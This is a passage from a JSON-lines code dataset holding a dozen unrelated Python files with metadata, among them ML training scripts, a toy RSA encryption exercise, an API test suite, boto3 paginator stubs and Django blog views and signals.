Precision and Recall\r\nfrom sklearn.metrics import classification_report\r\nprint(\"Accuracy of LR classifier:\",lr.score(X_test,y_test))\r\nprint(classification_report(y_test,lr_y_predict,target_names=[\"benign\",\"malignant\"]))\r\n# Analyse the result of the SGD classifier\r\nprint(\"Accuracy of SGD classifier:\",sgdc.score(X_test,y_test))\r\nprint(classification_report(y_test,sgdc_y_predict,target_names=[\"benign\",\"malignant\"]))\r\n\"\"\"\r\nThe first method gives the analytical solution for the parameters of the logistic regression model,\r\nwhich is more accurate but takes more time.\r\nThe second method computes a solution with SGD,\r\nwhich is more powerful for big data.\r\n\"\"\"\r\n","sub_path":"classicMachineLearning/LinearRegression_BreastCancerPrediction.py","file_name":"LinearRegression_BreastCancerPrediction.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"522322797","text":"import json\nn=12\nssarr=[]\nnumattarr=[]\nsumattarr=[]\navattarr=[]\nfor k in range(n+1): \n    with open(\"num_vars=\"+str(n)+\"_depth=\"+str(k)+\".json\") as data:\n        loaded=json.load(data)\n    ss=[0]*len(loaded)\n    numatt=[0]*len(loaded)\n    sumatt=[0]*len(loaded)\n    avatt=[]\n    for i,dds in enumerate(loaded):\n        tempss=0\n        tempnumatt=0\n        tempsumatt=0\n        tempavatt=0\n        for attbas in dds:\n            att=attbas[0]\n            if(att==1):\n                tempss+=1\n            tempnumatt+=1\n            tempsumatt+=att\n            avatt.append(att)\n        ss[i]=tempss\n        numatt[i]=tempnumatt\n        sumatt[i]=tempsumatt\n    sscnt=[]\n    numcnt=[]\n    sumcnt=[]\n    avcnt=[]\n    for j in range(min(ss),max(ss)+1):\n        if((ss.count(j)+0.0)/len(loaded)>0):\n            sscnt.append([j,(ss.count(j)+0.0)/len(loaded)])\n    for j in range(min(numatt),max(numatt)+1):\n        if((numatt.count(j)+0.0)/len(loaded)>0):\n            numcnt.append([j,(numatt.count(j)+0.0)/len(loaded)])\n    for j in range(min(sumatt),max(sumatt)+1):\n        if((sumatt.count(j)+0.0)/len(loaded)>0):\n            sumcnt.append([j,(sumatt.count(j)+0.0)/len(loaded)])\n    for j in range(min(avatt),max(avatt)+1):\n        if((avatt.count(j)+0.0)/len(loaded)>0):\n            avcnt.append([j,(avatt.count(j)+0.0)/len(loaded)])\n    ssarr.append(sscnt)\n    numattarr.append(numcnt)\n    sumattarr.append(sumcnt)\n    avattarr.append(avcnt)\nwith open(\"mathematica_data_n.json\", \"w+\") as output:\n    json.dump(ssarr,output)\nwith open(\"mathematica_data_m.json\", \"w+\") as output:\n    json.dump(numattarr,output)\nwith open(\"mathematica_data_o.json\", \"w+\") as output:\n    json.dump(sumattarr,output)\nwith open(\"mathematica_data_p.json\", \"w+\") as output:\n    json.dump(avattarr,output)\n","sub_path":"data/temp_analysis.py","file_name":"temp_analysis.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"564385560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAsks the user for a string and prints out whether this string is a\npalindrome or not.\n\nCreated on Thu Mar 1 22:49:48 2018\n\n@author: Abdallah Emad\n\"\"\"\n\nword = input('Please enter a word: ')\nprint('Great! The word {0} is a palindrome'.format(word)\n      if word == word[::-1]\n      else 'Sorry! The word {0} is not a 
palindrome'.format(word))\n","sub_path":"string_lists.py","file_name":"string_lists.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"613898748","text":"from dataset import MicroscopyDataset, RandomResizedCrop, RandomRotation, RandomFlip, ToTensor, ExtendImageChannel, vis_res\nfrom res_unet import resnet18_UNet\nfrom loss_metric import DiceLoss\n\nimport os\nimport time\nimport json\nimport torch\nimport logging\nimport numpy as np\nfrom torchvision import transforms\n\n\ndef do_epoch(args, epoch, net, dataset, optimizer, eval=False, K=30000):\n dataloader = torch.utils.data.DataLoader(dataset, \n batch_size=args.batchsize if not eval else 1, \n shuffle=not eval, \n num_workers=0, \n drop_last=False\n )\n net = net.train(not eval)\n\n epoch_loss = 0.0\n epoch_acc = 0.0\n epoch_hem_loss = 0.0\n for iter, data in enumerate(dataloader):\n img, mask = data\n img = img.float().cuda() if args.use_cuda else img.float().cpu()\n if mask is not None:\n mask = mask.float().cuda() if args.use_cuda else mask.float().cpu()\n pred = net(img)\n loss_dice = net.loss(pred, mask)\n loss_map = net.boundaryloss(pred, mask)\n\n if not eval:\n loss_map_flat = loss_map.reshape(args.batchsize, -1)\n else:\n loss_map_flat = loss_map.reshape(1, -1)\n\n loss_hem = loss_map_flat.topk(K, dim=-1)[0].mean()\n \n if epoch > (args.epoch/2):\n w_boundary = 0.0000005\n else:\n w_boundary = 0\n \n loss = loss_dice + (w_boundary * loss_hem)\n acc = net.metric(pred.detach(), mask.detach())\n epoch_loss += loss.item()\n epoch_hem_loss += (w_boundary * loss_hem).item()\n epoch_acc += acc.item()\n\n if not eval:\n loss.backward()\n optimizer.step()\n\n if eval:\n title = 'acc={}'\n prob = torch.sigmoid(torch.max(pred[0,:,:,:],0)[0])\n vis_res(img[0,:,:,:].permute(1, 2, 0), mask[0,0,:,:], loss_map[0,0,:,:], prob>0.5, save_path='./epoch_{}_iter_{}.png'.format(epoch, iter), title=None)\n\n return epoch_loss / iter, epoch_acc / iter, epoch_hem_loss / iter\n \n\n\ndef run(args):\n # init model\n if args.enable_resnet_pretrain:\n net = resnet18_UNet(pretrained=not args.resume, n_class=1, input_size=256)\n if args.resume:\n net.load_state_dict(torch.load(args.resume_model_path), strict=True)\n else:\n net = resnet18_UNet(pretrained=False, n_class=1, input_size=256)\n \n net.loss = DiceLoss()\n net.boundaryloss = torch.nn.BCEWithLogitsLoss(reduction='none')\n net.metric = DiceLoss(get_coefficient=True)\n\n if args.use_cuda:\n net = net.cuda()\n \n # init optimizer\n optimizer = torch.optim.Adam(net.parameters(), lr=args.lr, betas=(0.9, 0.999))\n\n # init dataloader\n train_transforms = transforms.Compose([\n RandomRotation(),\n RandomResizedCrop(size=args.training_patch_size),\n RandomFlip(),\n ToTensor(),\n ExtendImageChannel(),\n ])\n train_dataset = MicroscopyDataset(args.dataset_root, args.dataset_train_list, transform=train_transforms)\n val_dataset = MicroscopyDataset(args.dataset_root, args.dataset_val_list, transform=train_transforms)\n logging.info('Train set size:{}, Val set size:{}'.format(len(train_dataset), len(val_dataset)))\n\n logging.info('Start training...')\n for epoch in range(args.epoch):\n time1 = time.time()\n loss, acc, hem_loss = do_epoch(args, epoch, net, train_dataset, optimizer)\n time2 = time.time()\n logging.info('epoch [{}/{}], time elapse={:.2f}, loss={:.4f}, train_acc={:.4f}, hem_loss={:.4f}'.format(epoch, args.epoch, time2-time1, loss, acc, hem_loss))\n\n if epoch % args.eval_freq == 0:\n 
logging.info('Evaluate model...')\n            loss, acc, hem_loss = do_epoch(args, epoch, net, val_dataset, None, eval=True)\n            logging.info('val_loss={:.4f}, val_acc={:.4f}, hem_loss={:.4f}'.format(loss, acc, hem_loss))\n    \n    logging.info('Finish training...')\n\n\nif __name__ == '__main__':\n    def bool_str(x):\n        return str(x).lower() in ['true', '1']\n    \n    import configargparse\n    parser = configargparse.ArgParser()\n    \n    parser.add_argument('--dataset-root', type=str, required=True)\n    parser.add_argument('--training-patch-size', default=512, type=int, help='image crop size during training')\n    parser.add_argument('--dataset-train-list', type=str, required=True)\n    parser.add_argument('--dataset-val-list', type=str, required=True)\n    \n    parser.add_argument('--lr', default=0.001, type=float, help='learning rate')\n    parser.add_argument('--epoch', default=10, type=int, help='learning epochs')\n    parser.add_argument('--batchsize', default=5, type=int, help='batch size during training')\n    parser.add_argument('--eval-freq', default=1, type=int, help='to evaluate and visualize at every X epochs')\n    \n    parser.add_argument('--enable-resnet-pretrain', type=bool_str, required=True)\n    parser.add_argument('--resume', default=False, type=bool_str, help='load weights from a specified model')\n    parser.add_argument('--resume-model-path', type=str)\n\n    parser.add_argument('--use-cuda', default=True, type=bool_str)\n    \n    args = parser.parse_args()\n    args.training_patch_size = [args.training_patch_size, args.training_patch_size]\n\n    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(filename)s:%(lineno)s %(levelname)s %(message)s')\n    logging.info(json.dumps(vars(args), indent=4))\n\n    run(args)\n","sub_path":"HEM/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"350084328","text":"# returns (a^b) mod n\ndef modExponent(a, b, n):\n    result = 1\n    a = a % n\n    if (a == 0):\n        return 0\n    while (b > 0):\n        if (b & 1 == 1):\n            result = (result * a) % n\n        b = b >> 1\n        a = (a * a) % n\n    return result\n\n\n# Identify public key\npublic_key = (46947848749720430529628739081, 37267486263679235062064536973)\nn = public_key[0]\ne = public_key[1]\nprint(\"n: \" + str(n))\nprint(\"e: \" + str(e) + \"\\n\")\n\n# Convert to binary\nm = input(\"Enter plaintext: \")\nm_bin = ''.join(format(ord(i), '08b') for i in m)\nprint(\"binary version: \" + str(m_bin) + \"\\n\")\nm_dec = int(''.join(format(ord(i), '08b') for i in m), 2)\nprint(\"decimal version: \" + str(m_dec) + \"\\n\")\n\n# Encrypt\nc = modExponent(m_dec, e, n)\nprint(\"c: \" + str(c) + \"\\n\")\n","sub_path":"pset5/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"188402887","text":"#!/usr/bin/python3\nimport pymysql\nimport unittest\nimport requests\nimport os\nfrom tests.configAPI import configAPI\nfrom tests.loggingAPI import loggingAPI\nfrom tests.oAuthGenerator import oAuthGenerator\n\n\"\"\" TestSuiteConfigItemsPut class tests all the cases for the config items PUT api\"\"\"\nclass TestSuiteConfigItemsPut(unittest.TestCase):\n\n    \"\"\"This method is for getting the initial ID\"\"\"\n    def compare_against_DB(self,client_name,counter):\n        loggingAPI.logger.info(\"the value that is sent in this function is: \" + client_name)\n        if counter == 1:\n            sel_query = \"SELECT id FROM RCANALYTICS_CONFIG_SERVICE.CONFIG_ITEMS WHERE CLIENT_ID = \" + 
\"'\" + client_name + \"';\"\n self.cursor.execute(sel_query)\n sel_results = list(self.cursor.fetchall())\n results = sel_results[0]\n self.res_list = results[0]\n return self.res_list\n else:\n sel_query = \"SELECT * FROM RCANALYTICS_CONFIG_SERVICE.CONFIG_ITEMS WHERE CLIENT_ID = \" + \"'\" + client_name + \"';\"\n print(sel_query)\n self.cursor.execute(sel_query)\n sel_results = list(self.cursor.fetchall())\n results = sel_results[0]\n self.res_list = list(results[1:4])\n print(self.res_list)\n return self.res_list\n\n \"\"\"setUp method initialize the variables and values that are used across the test cases\"\"\"\n def setUp(self):\n self.set_up_list = configAPI.configlist\n self.GET_URL = self.set_up_list[0]\n self.oAuth = oAuthGenerator.Auth(self, self.set_up_list[6], self.set_up_list[7], self.set_up_list[8], self.set_up_list[9])\n self.parms = {'client_id': self.set_up_list[1]}\n self.header = {'Authorization': self.oAuth, 'Content-Type':'application/json'}\n self.db = pymysql.connect(self.set_up_list[2], self.set_up_list[3], self.set_up_list[4],self.set_up_list[5])\n self.cursor = self.db.cursor()\n\n # \"\"\"test_rest_api_putRequest function is used to check the API PUT request with existing ID\"\"\"\n # def test_Step010_putRequest_existing_id(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"test\", \"value\": \"{\\\"test\\\":1251}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is to check for 409 error on empty client_id\"\"\"\n # def test_Step004_putRequest_empty_clientid(self):\n # params = {\"client_id\": \"\", \"key\": \"\", \"value\": \"\"}\n # self.id_table = self.compare_against_DB(\"test_blr\",1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '409')\n #\n # \"\"\"This case is to check for 409 error on empty key and value\"\"\"\n # def test_Step003_putRequest_empty_key_value(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"\", \"value\": \"\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"],1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '409')\n #\n # \"\"\"This case is to check for 404 error on the invalid config_ID\"\"\"\n # def test_Step002_putRequest_invalid_config_id(self):\n # completeURL = str(self.GET_URL) + \"/0\"\n # params = {\"client_id\":\"test_blr\",\"key\":\"1\",\"value\":\"1\"}\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '404')\n\n \"\"\"This case is to create a new client in table\"\"\"\n def test_Step001_postRequest_new_id(self):\n completeURL = str(self.GET_URL)\n params = {\"client_id\": \"test_blr\", \"key\": \"test\", \"value\": \"test\"}\n self.res = requests.post(completeURL, headers=self.header, json=params)\n self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n 
self.response = self.res.status_code\n self.assertEqual(str(self.response), '201')\n self.assertEqual(list(self.compare_against_DB(params[\"client_id\"],99)), list(params.values()))\n\n \"\"\"This case is used to check for 204 upon adding net_revenue as key and a json as value\"\"\"\n def test_Step009_putRequest_adding_net_revenue(self):\n params = {\"client_id\": \"test_blr\", \"key\": \"\\\"net_revenue\\\"\", \"value\": \"{\\\"NetRevenue\\\":\\\"[\\\"{\\\"id\\\": 1, \\\"client_id\\\": \\\"test\\\", \\\"org_id\\\": \\\"Org1\\\", \\\"month\\\": 1, \\\"year\\\": 2014, \\\"net_revenue\\\": 1002}\\\"]\\\"}\"}\n self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n print(\"after first test\")\n print(self.id_table)\n completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n self.res = requests.put(completeURL, headers=self.header, json=params)\n self.response = self.res.status_code\n self.assertEqual(str(self.response), '204')\n tokka = self.compare_against_DB(params[\"client_id\"],99)\n print(tokka)\n self.assertEqual(tokka, list(params.values()))\n\n # \"\"\"This case is used to check for 204 upon adding pos_cash_collections as key and a json as value\"\"\"\n # def test_Step005_putRequest_adding_POS_cash_collections(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"pos_cash_collection\", \"value\": \"{\\\"Days\\\": 12}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding pos_days as key and a json as value\"\"\"\n # def test_Step006_putRequest_adding_POS_days(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"pos_days\", \"value\": \"{\\\"Days\\\": 12}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding days_in_dbfb as key and a json as value\"\"\"\n # def test_Step007_putRequest_adding_days_in_dnfb(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"days_in_dnfb\", \"value\": \"{\\\"Range\\\": 1}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n #\n # \"\"\"This case is used to check for 204 upon adding days_in_dnfc as key and a json as value\"\"\"\n # def test_Step008_putRequest_adding_days_in_dnfc(self):\n # params = {\"client_id\": \"test_blr\", \"key\": \"days_in_dnfc\", \"value\": \"{\\\"Range\\\": 1}\"}\n # self.id_table = self.compare_against_DB(params[\"client_id\"], 1)\n # completeURL = str(self.GET_URL) + \"/\" + str(self.id_table)\n # self.res = requests.put(completeURL, headers=self.header, 
json=params)\n # self.response = self.res.status_code\n # self.assertEqual(str(self.response), '204')\n # self.assertEqual(self.compare_against_DB(params[\"client_id\"],99), list(params.values()))\n\n \"\"\"This is to delete all the test data\"\"\"\n def test_Step012_putRequest_remove_extra_rows(self):\n query_teardown = \"Delete from rcanalytics_config_service.config_items where client_id = 'test_blr'\"\n value = self.cursor.execute(query_teardown)\n self.db.commit()\n self.db.close()\n loggingAPI.logger.info(\"Remove the test data.\")","sub_path":"pythonscripts/tokka/yamlgenerator/Requests/Final_Suite/tests/RCR_VR_HA_Service_ConfigTool_Config_Items_PUT.py","file_name":"RCR_VR_HA_Service_ConfigTool_Config_Items_PUT.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"521832300","text":"import threading\nimport time\nimport queue\nimport random\n\n\n# queue.Queue是多线程安全的\n\nclass Producer(threading.Thread):\n\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n for i in range(10):\n item = random.randint(0,256)\n self.queue.put(item)\n print('Producer notify : item {0} appended to queue by {1}'.format(item,self.name))\n\n\nclass Consumer(threading.Thread):\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n while True:\n item = self.queue.get()\n print('Consumer notify : item {0} poped from queue by {1}'.format(item,self.name))\n self.queue.task_done()\n\nif __name__ == '__main__':\n queue = queue.Queue()\n t1 = Producer(queue)\n t2 = Consumer(queue)\n t3 = Consumer(queue)\n t4 = Consumer(queue)\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n\n\n\n\n\n\n","sub_path":"LearnPython/Python_New/Parallels/ThreadQueueEx.py","file_name":"ThreadQueueEx.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549804976","text":"\"\"\"\nType annotations for batch service client paginators.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html)\n\nUsage::\n\n ```python\n import boto3\n\n from mypy_boto3_batch import BatchClient\n from mypy_boto3_batch.paginator import (\n DescribeComputeEnvironmentsPaginator,\n DescribeJobDefinitionsPaginator,\n DescribeJobQueuesPaginator,\n ListJobsPaginator,\n ListSchedulingPoliciesPaginator,\n )\n\n client: BatchClient = boto3.client(\"batch\")\n\n describe_compute_environments_paginator: DescribeComputeEnvironmentsPaginator = client.get_paginator(\"describe_compute_environments\")\n describe_job_definitions_paginator: DescribeJobDefinitionsPaginator = client.get_paginator(\"describe_job_definitions\")\n describe_job_queues_paginator: DescribeJobQueuesPaginator = client.get_paginator(\"describe_job_queues\")\n list_jobs_paginator: ListJobsPaginator = client.get_paginator(\"list_jobs\")\n list_scheduling_policies_paginator: ListSchedulingPoliciesPaginator = client.get_paginator(\"list_scheduling_policies\")\n ```\n\"\"\"\nfrom typing import Iterator, List\n\nfrom botocore.paginate import Paginator as Boto3Paginator\n\nfrom .literals import JobStatusType\nfrom .type_defs import (\n DescribeComputeEnvironmentsResponseTypeDef,\n DescribeJobDefinitionsResponseTypeDef,\n DescribeJobQueuesResponseTypeDef,\n KeyValuesPairTypeDef,\n ListJobsResponseTypeDef,\n 
ListSchedulingPoliciesResponseTypeDef,\n PaginatorConfigTypeDef,\n)\n\n__all__ = (\n \"DescribeComputeEnvironmentsPaginator\",\n \"DescribeJobDefinitionsPaginator\",\n \"DescribeJobQueuesPaginator\",\n \"ListJobsPaginator\",\n \"ListSchedulingPoliciesPaginator\",\n)\n\nclass DescribeComputeEnvironmentsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeComputeEnvironments)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describecomputeenvironmentspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n computeEnvironments: List[str] = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeComputeEnvironmentsResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeComputeEnvironments.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describecomputeenvironmentspaginator)\n \"\"\"\n\nclass DescribeJobDefinitionsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobDefinitions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobdefinitionspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n jobDefinitions: List[str] = None,\n jobDefinitionName: str = None,\n status: str = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeJobDefinitionsResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobDefinitions.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobdefinitionspaginator)\n \"\"\"\n\nclass DescribeJobQueuesPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobQueues)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobqueuespaginator)\n \"\"\"\n\n def paginate(\n self, *, jobQueues: List[str] = None, PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[DescribeJobQueuesResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.DescribeJobQueues.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#describejobqueuespaginator)\n \"\"\"\n\nclass ListJobsPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListJobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listjobspaginator)\n \"\"\"\n\n def paginate(\n self,\n *,\n jobQueue: str = None,\n arrayJobId: str = None,\n multiNodeJobId: str = None,\n jobStatus: JobStatusType = None,\n filters: List[\"KeyValuesPairTypeDef\"] = None,\n PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[ListJobsResponseTypeDef]:\n 
\"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListJobs.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listjobspaginator)\n \"\"\"\n\nclass ListSchedulingPoliciesPaginator(Boto3Paginator):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListSchedulingPolicies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listschedulingpoliciespaginator)\n \"\"\"\n\n def paginate(\n self, *, PaginationConfig: PaginatorConfigTypeDef = None\n ) -> Iterator[ListSchedulingPoliciesResponseTypeDef]:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/batch.html#Batch.Paginator.ListSchedulingPolicies.paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_batch/paginators.html#listschedulingpoliciespaginator)\n \"\"\"\n","sub_path":"typings/mypy_boto3_batch/paginator.pyi","file_name":"paginator.pyi","file_ext":"pyi","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"577794982","text":"from django.shortcuts import render,HttpResponse,redirect\nfrom blog.models import Post,BlogComment\nfrom django.contrib import messages\n# Create your views here.\ndef blogHome(request):\n # return HttpResponse(\"from blogHome\")\n allPost = Post.objects.all()\n context = {'allPost':allPost}\n return render(request,'blog/blogHome.html',context)\n\ndef blogPost(request,slug):\n post = Post.objects.filter(slug=slug).first()\n comments = BlogComment.objects.filter(post=post, parent=None)\n replies = BlogComment.objects.filter(post=post).exclude(parent=None)\n repDict={}\n for reply in replies:\n if reply.parent.sno not in repDict.keys():\n repDict[reply.parent.sno] = [reply]\n else:\n repDict[reply.parent.sno].append(reply) \n context = {'post':post,'comments':comments,'user':request.user,'repDict': repDict}\n return render(request,'blog/blogPost.html',context)\n\ndef PostComment(request):\n if request.method=='POST':\n comment = request.POST.get('comment')\n user = request.user\n postSno = request.POST.get('postSno')\n post = Post.objects.get(sno=postSno)\n parentSno = request.POST.get('parentSno')\n if parentSno==\"\":\n comment = BlogComment(comment=comment,post=post,user=user)\n comment.save()\n messages.success(request,\"your comment has been posted successfully!\") \n else:\n parent = BlogComment.objects.get(sno=parentSno)\n comment = BlogComment(comment=comment,post=post,user=user,parent=parent)\n comment.save()\n messages.success(request,\"your replay has been posted successfully!\")\n return redirect(f\"/blog/{post.slug}\")\n ","sub_path":"django/blog/hackcode/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239958063","text":"__author__ = 'fred'\n\nimport inspect\nimport numpy as np\n\n\nclass Error:\n def cumulate(self, *others):\n if len(others) > 1:\n return Error.cumulate(self.cumulate(others[0]), *others[1:])\n\n def newfunc(*args):\n value = args[0]\n params, errs = args[1::2], args[2::2]\n return self.__func(value, *(params[:self.__n_params] + errs[:self.__n_params])) \\\n + 
others[0].__func(value, *(params[self.__n_params:] + errs[self.__n_params:]))\n\n        return Error(newfunc)\n\n\n    def __init__(self, func):\n        params = inspect.getargspec(func)\n        if len(params[0]) % 2 == 0:\n            raise ValueError(\"Wrong number of parameters\")\n        else:\n            self.__n_params = len(params[0]) // 2\n            self.__func = lambda *args: func(*args)**2\n\n    def __call__(self, *args):\n        if 2*len(args) > self.__n_params:\n            print(\"Warning: too many parameters\")\n        return np.sqrt(self.__func(*args))\n\nlinear = Error(lambda v, x, dx: v/x*dx)\nsquare = Error(lambda v, x, dx: 2*v/x*dx)","sub_path":"pythonUtils/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"176405115","text":"import csv\nimport re\nfrom nltk.util import ngrams\nimport os\n\n\nwith open('Paulines-Kinadata_for_python.csv') as file:\n    reader = csv.reader(file)\n    gay_kina_list = list(reader)\n    #print(gay_kina_list)\n\ns = gay_kina_list\ns = str(s)\ns = s.lower()\ns = re.sub(r'[^a-zA-Z0-9\\\s]', ' ', s)\ntokens = [token for token in s.split(\" \") if token != \"\"]\noutput = list(ngrams(tokens, 3))\ndata_list = output\nprint(data_list)\n\nwith open('data.csv', 'w', newline='') as myfile:\n    wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n    wr.writerows(data_list)\n\nmyfile.close()\n\n\n\n\n\n\n","sub_path":"N_gram_4_gay_maps.py","file_name":"N_gram_4_gay_maps.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"19149590","text":"from django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\n\nfrom foodtrack.models import PurchaseItem, UsageCounter, Food\n\n\n@receiver(post_save, sender=PurchaseItem)\ndef purchase_saved(sender, **kwargs):\n    if kwargs[\"created\"]:\n        purchase: PurchaseItem = kwargs[\"instance\"]\n        add_food_usage_count(purchase.food, purchase.owner)\n        # save_form_preference(purchase, purchase.owner_id)\n\n\n@receiver(post_save, sender=User)\ndef create_auth_token(sender, instance=None, created=False, **kwargs):\n    if created:\n        Token.objects.create(user=instance)\n\n\ndef add_food_usage_count(food, user):\n    content_type_food = ContentType.objects.get_for_model(Food)\n    usage, created = UsageCounter.objects.get_or_create(defaults={\"count\": 1},\n                                                        content_type=content_type_food,\n                                                        object_id=food.id,\n                                                        owner=user)\n    if not created:\n        usage.count += 1\n        